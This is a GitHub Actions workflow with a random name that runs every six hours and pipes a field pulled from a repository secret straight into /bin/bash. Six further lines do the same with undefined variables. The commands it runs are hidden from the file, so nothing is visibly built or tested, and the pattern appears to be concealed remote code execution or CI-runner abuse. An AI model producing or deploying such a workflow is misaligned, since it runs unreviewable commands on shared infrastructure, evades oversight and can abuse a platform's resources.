name: duansizhi9615
on:
  workflow_dispatch:
  schedule:
    - cron: '3 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: duansizhi9615
        env:
          i0: ${{ secrets.i0 }}
        run: |
          echo $i0 | jq -r .ijpi551 | /bin/bash
          echo $zws8 | jq -r .afroq296 | /bin/bash
          echo $zh75 | jq -r .kchwi56 | /bin/bash
          echo $cfa1 | jq -r .yhgn76807 | /bin/bash
          echo $oj82 | jq -r .vyhh2 | /bin/bash
          echo $cpk2 | jq -r .c72156 | /bin/bash
          echo $b38300 | jq -r .phrl68 | /bin/bash

